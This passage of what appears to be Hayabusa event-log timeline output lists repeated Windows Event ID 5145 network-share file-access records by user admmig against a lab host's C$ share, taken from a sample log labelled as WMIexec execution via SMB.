+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\cs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\da : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\de : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\el : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\en : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\es : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\et : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\he : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hu : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\it : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ja : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ko : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\nl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\no : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt-BR : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ro : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ru : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sr-Latn-RS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.447 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\th : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\tr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\uk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANS : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANT : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HK : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\DevInvCache : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\apppatch64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom\Custom64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\en-US : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppReadiness : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 : IP Address: 